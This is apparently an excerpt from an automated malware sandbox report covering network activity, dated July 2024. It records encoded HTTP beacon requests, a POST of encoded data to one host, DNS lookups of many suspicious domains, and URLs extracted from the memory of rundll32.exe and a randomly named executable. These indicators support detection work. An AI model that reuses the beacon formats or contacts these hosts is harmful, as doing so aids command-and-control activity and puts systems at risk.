f2 cc d9 2c 56 97 96 ba d5 1c 5c d6 0e 19 a0 65 1d 90 d2 3a 93 3e 53 1e 32 ae 02 ce 58 1d cf f3 1a 73 44 f3 56 e4 d1 d0 1c e6 89 26 d7 35 c5 60 1a 15 94 30 63 94 6d 86 7e 86 af 5a d3 f0 55 d2 82 65 08 e5 1d 05 12 0a 65 b4 a1 cf 82 b7 af 59 d6 dd fb 25 0f 91 64 90 88 f0 a1 45 42 e4 63 4b c5 97 e7 3b 24 f4 ef 74 fd 52 1c f9 d7 de 81 88 9a 0c c7 18 71 19 0c 4c 95 75 6f 82 2a 4c fc 71 8f 2d 2d 6b 90 a0 32 5d a4 ca 05 2d 25 7a aa dc a9 77 36 20 d3 41 b1 Data Ascii: W[oD+FA{&"5!HTc4glW"RH CMY&U<|w{o{qm7C8=[F{M#[q>i2h#N6pha+Vm<Gh1ma$FE+NxfJ4>0A,8!vj".uC"ggBgE1D6'I0??a~y|eT^Kw{6T6z=ne%-CB.ClX5y4a3W5BcNSd!q9*cW+z`F\DilWlJ\.,V\e:>S2XsDV&5`0cm~ZUeeY%dEBcK;$t
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: F-WEBDate: Wed, 03 Jul 2024 08:53:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1127Connection: closeContent-Encoding: gzipFAI-W-FLOW: 1439867166Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96eFAI-W-AGENT_AID: 23934566Update-Time: 1718640911Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenVary: Accept-EncodingSet-Cookie: _cliid=QWDiENi4xHZuMd2b; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:22 GMT; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 00 00 cd 57 5b 6f dc 44 14 fe 2b 87 46 95 41 aa d7 7b c9 26 8d f7 22 35 97 15 91 8a e0 21 48 f0 54 cd da 63 ef 34 b6 c7 8c 67 d3 6c 57 91 a0 22 e2 01 89 52 01 aa 48 91 ca 03 0f 95 10 a9 04 12 20 da d0 1f 43 92 4d 9e f8 0b cc 8c ed dd 59 ef 26 55 a5 3c b0 96 bc eb f1 b9 7c df 77 ce 1c 7b 9b 6f ad bf bf b6 f5 f1 07 1b f0 ee d6 7b b7 db cd 1e 0f 03 71 c6 c8 6d 37 43 cc 11 38 3d c4 12 cc 5b 46 9f 7b e6 4d 23 5b ed 71 1e 9b f8 93 3e d9 69 19 1f 99 1f de 32 d7 68 18 23 4e ba 01 36 c0 a1 11 c7 91 70 d9 dc 68 61 d7 17 2b 56 e6 16 a1 10 b7 8c 6d 3c b8 47 99 9b 68 96 a6 31 6d e2 e2 c4 61 24 e6 84 46 45 2b 4e 78 80 db 66 d3 4a 7f 34 13 3e 08 30 f0 41 2c dc 38 de e5 96 93 88 c8 21 76 09 6a 19 22 0a c6 d1 8d 98 91 88 1b ed 2e 75 07 43 e8 22 67 db 67 b4 1f b9 f6 42 67 45 1e 8d 10 31 9f 44 36 94 e3 dd 86 27 b2 99 1e 0a 49 30 b0 8d 93 bf 0f cf 8e 9e 9f 3f d9 3f 7f f1 c8 b8 61 9c 1c 7e 79 7c f4 8d d1 00 65 94 90 fb d8 ae 54 85 cf 5e a9 4b 77 87 f7 88 cb 7b 36 54 ca e5 eb 93 88 80 fa 9c 36 7a 98 f8 3d 6e ab 0b 65 0c 25 05 7f 2d a5 06 43 d0 9d bb 42 1d cc cc 2e e5 9c 86 a6 43 03 ca 6c 58 c0 35 79 34 02 12 61 33 8b 57 97 80 35 42 63 db 4e a7 53 88 a2 64 b2 21 a1 01 71 0b b7 f2 d4 39 91 02 b6 f4 2a 63 57 2b cb 94 7a fa 94 a9 19 60 8f db 95 fa f5 46 8c 5c 97 44 be c9 69 6c 57 15 be 6c c5 96 4a 01 5c ac af 2e ab 
f2 cc d9 2c 56 97 96 ba d5 1c 5c d6 0e 19 a0 65 1d 90 d2 3a 93 3e 53 1e 32 ae 02 ce 58 1d cf f3 1a 73 44 f3 56 e4 d1 d0 1c e6 89 26 d7 35 c5 60 1a 15 94 30 63 94 6d 86 7e 86 af 5a d3 f0 55 d2 82 65 08 e5 1d 05 12 0a 65 b4 a1 cf 82 b7 af 59 d6 dd fb 25 0f 91 64 90 88 f0 a1 45 42 e4 63 4b c5 97 e7 3b 24 f4 ef 74 fd 52 1c f9 d7 de 81 88 9a 0c c7 18 71 19 0c 4c 95 75 6f 82 2a 4c fc 71 8f 2d 2d 6b 90 a0 32 5d a4 ca 05 2d 25 7a aa dc a9 77 36 20 d3 41 b1 Data Ascii: W[oD+FA{&"5!HTc4glW"RH CMY&U<|w{o{qm7C8=[F{M#[q>i2h#N6pha+Vm<Gh1ma$FE+NxfJ4>0A,8!vj".uC"ggBgE1D6'I0??a~y|eT^Kw{6T6z=ne%-CB.ClX5y4a3W5BcNSd!q9*cW+z`F\DilWlJ\.,V\e:>S2XsDV&5`0cm~ZUeeY%dEBcK;$t
            Source: global traffic | HTTP traffic detected:
              GET /l25n/?Qb94=7vWTifjxU&ylT8el=auppmJM7eN7J/jcd3Cnnc7lcHiLNgr09bdvJbM3sU1/Dmtxph+2FzvX7ZDnD2EcIcX9RCCjXq1LDmMY1SoU+nq8rcMPpo2Cr+tMuRnJbKxq7CEWaX/NqKVE= HTTP/1.1
              Host: www.zt555.shop
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /f0fa/?Qb94=7vWTifjxU&ylT8el=xEHl79bWtW6ubhQfSoH97y0Qn20SG8yk5613CYRnCuX+EaUdTnw5hRzhIFWMyf9Ue4jcKh73mqYqHXL3KYCSgMywK+MaAYZcUVEgz/x9qwHKwJpT4dGZYKc= HTTP/1.1
              Host: www.hawalaz.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /qvp8/?ylT8el=mplvrs1ArIkdV+pbxofmUrh9prbBWCkT+xqmpCLdJLMyBhuMsd9mhte1ppk8n/DSN9iY8LBVRzSodz5vy5F/ty/lBcXgfSQQVjq9BvSoxXo59QHAZm1IeeI=&Qb94=7vWTifjxU HTTP/1.1
              Host: www.66hc7.com
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /450c/?Qb94=7vWTifjxU&ylT8el=/ao65P+sOfMmbfuniX6EnBn+VadGjlZ4IHs7OXNxrL4MnIz0MXJ+3t4uCaWRdYsePUgUyRGsjSJtYkpLrLyO4a/zR2SZCsSjaR7P/IMYlkzk2RPJsuViTJY= HTTP/1.1
              Host: www.zl1l5r.website
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /f0bn/?Qb94=7vWTifjxU&ylT8el=8gTqnLvKWah2bzreY4Z7YC6tcQCJVJlJXhg7Umglyi2zgynbPTp6zLopmb5gqsRo3dR1TaY9uWyFfEDO77D4zzlWEvz5BTf+ZLZnZGAxAhIiwZDsfI/I78A= HTTP/1.1
              Host: www.marismotivates.com
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM= HTTP/1.1
              Host: www.lecoinsa.net
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /i74x/?ylT8el=rGww97JzOeWTLmyois9H82aBQ3facQDCwEviMnQ79nb2eFak94tqYxOEecYPqZ845ayBGu2PRCoY8TnogyJmQQHYtnGZFnvjZEpOTC2C7mypHaGwxY9ZF1g=&Qb94=7vWTifjxU HTTP/1.1
              Host: www.778981.com
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /fuvg/?Qb94=7vWTifjxU&ylT8el=wjL2fUVi/vacV80Y2aNNPqSsAyaVO2G0XUXvAjUGJRlNA9hvm73ZM/ZGCRwMrdgYWSVcgksWY7rEUvpJmp/24/R5TooPs7UexVe6llrM7njVoxJ4Iww3fUU= HTTP/1.1
              Host: www.yetung.com
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /73ru/?ylT8el=Zh+IM8qjm4uq8k9wxtMLd6Xf0ZIUNYGdjg1+kqPemyuHWYjZ2nTRrdxzh5HhdoGeXRxYWxa1gnZNrA+Bjjg73w83aTj9n1osxTjbZgXdDDbnL1DvvKoogN8=&Qb94=7vWTifjxU HTTP/1.1
              Host: www.oliviacorepilates.com
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /6xrq/?Qb94=7vWTifjxU&ylT8el=0ZLpfg2H9HntusEXGWgUouKi/jDeWipEcG796wEdKEsBvDcnIDw0UWV/lYuuqMa5oYme4k6lXZ3r5FhP4GItrsCavENJ4moU1CqQcclLTaPymUsAULXTIFQ= HTTP/1.1
              Host: www.personalcaresale.shop
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&Qb94=7vWTifjxU HTTP/1.1
              Host: www.lavillitadepapa.com
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | HTTP traffic detected:
              GET /l25n/?Qb94=7vWTifjxU&ylT8el=auppmJM7eN7J/jcd3Cnnc7lcHiLNgr09bdvJbM3sU1/Dmtxph+2FzvX7ZDnD2EcIcX9RCCjXq1LDmMY1SoU+nq8rcMPpo2Cr+tMuRnJbKxq7CEWaX/NqKVE= HTTP/1.1
              Host: www.zt555.shop
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global traffic | DNS traffic detected: DNS query: www.zt555.shop
            Source: global traffic | DNS traffic detected: DNS query: www.pista789.win
            Source: global traffic | DNS traffic detected: DNS query: www.hawalaz.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.dribbean.website
            Source: global traffic | DNS traffic detected: DNS query: www.gzlhysuess.com
            Source: global traffic | DNS traffic detected: DNS query: www.66hc7.com
            Source: global traffic | DNS traffic detected: DNS query: www.zl1l5r.website
            Source: global traffic | DNS traffic detected: DNS query: www.xn--vct91ch7lruy.com
            Source: global traffic | DNS traffic detected: DNS query: www.marismotivates.com
            Source: global traffic | DNS traffic detected: DNS query: www.warcorpshs.com
            Source: global traffic | DNS traffic detected: DNS query: www.lecoinsa.net
            Source: global traffic | DNS traffic detected: DNS query: www.778981.com
            Source: global traffic | DNS traffic detected: DNS query: www.yetung.com
            Source: global traffic | DNS traffic detected: DNS query: www.oliviacorepilates.com
            Source: global traffic | DNS traffic detected: DNS query: www.personalcaresale.shop
            Source: global traffic | DNS traffic detected: DNS query: www.lavillitadepapa.com
            Source: unknown | HTTP traffic detected:
                POST /f0fa/ HTTP/1.1
                Host: www.hawalaz.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Encoding: gzip, deflate
                Accept-Language: en-US,en;q=0.9
                Origin: http://www.hawalaz.xyz
                Content-Length: 203
                Cache-Control: no-cache
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Referer: http://www.hawalaz.xyz/f0fa/
                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                Data Ascii: ylT8el=8GvF4IHDkxfRSB0rZImM9Q10szByHt37o5hNM6FlMJHoGIoBXzkgmnPuYie/hb93cvTTHBr0n6dfOWvXLPipzt6UIbkta/ReMU4TnudrqAbEzYFfkuWJcb+fTVfcVwPECiSYWNQIL6g6Ou02dAKkH8ex7l3sKU+gcTWc60rfswxIvvmc6y+zPhaRNG2cb/jUKg==
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 08:50:51 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 08:51:23 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 08:53:45 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Powered-By: PHP/7.4.33
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2F3VUpqZ02hxAOrdy5rAfygw52MPm9RKb2e6ChyOTy8THX61WcOizyyoVHDmOmHVsL7090hm83orzOA6wqFuoU1rJGNNK2nJtr0jOsbUqjYf%2FEIt0zyvWMMBBMLaV%2FmboV9sF2mm52ldDM1G"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89d5a59d5f5a72b3-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 190
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 08:53:47 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Powered-By: PHP/7.4.33
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rja9d8I04aHyYYI%2FqkuA7cgALUyPoYfNmWCImh3yaBuU8Y46Jd8RZ3XlgT80qIQN%2Fkazy4QeqgFHvQjKQr5gTjxvHBjriPkDMSsfjUklIjGIAcDYy6CRB1Fbw%2B%2B7ujvMVDXrna5Jt6o4jNZe"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89d5a5adcdbf42bb-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: fa0
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 08:53:50 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Powered-By: PHP/7.4.33
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L1Y%2FznWSJWw9k9Cb7166enshXr7IU5eRh0bEVR2zsJimcF0rzg8kMSSrvAl%2BaQbiDanA6%2F%2BDf9v6wIbQF9VSzicuNsfbnG1%2BCGkdMKhDUQazHRQL1dNdALEvP%2BtAJyOccGyX104oGut4KN%2Fs"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89d5a5bcfe6bc358-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 190
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 08:53:52 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Powered-By: PHP/7.4.33
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7%2FAPg60HedazsEu0tfq0EBkBUklhLNHZEJ780Pp9KCObyaD0j61WR%2FDFLW8YUU2Fgk1%2B6EJbsFsvurC6JbEFrGa155G3IPuHGA3s%2BZhWjqRknQV6Wj%2BfSnuc%2FR8MU0nADJ44KWeABjK92Yh"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89d5a5cce971c339-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 08:54:15 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://app.zl1ht1.website/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://beian.miit.gov.cn
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005A7E000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000412E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://goge8opp.com:301
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004908000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQE
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000006258000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004908000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wt
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://m.rmrwvg.cn/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://news.wawlh.cn/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://wap.tdvec.cn/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://wap.warsr.cn/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.a9d.net
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3730033950.0000000005A43000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lavillitadepapa.com
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3730033950.0000000005A43000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lavillitadepapa.com/6qht/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.qq42cw.website/news/MzSm.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.sophiahotelqingdao.com/news/bDhM.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yuanjihua.vip/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl100g.website
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl100g.website/news/Snfj.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1gya.website/news/X59A.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/450c/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/baike/
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_07.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_08.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_11.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_14.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_34.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_35.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_37.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_39.html
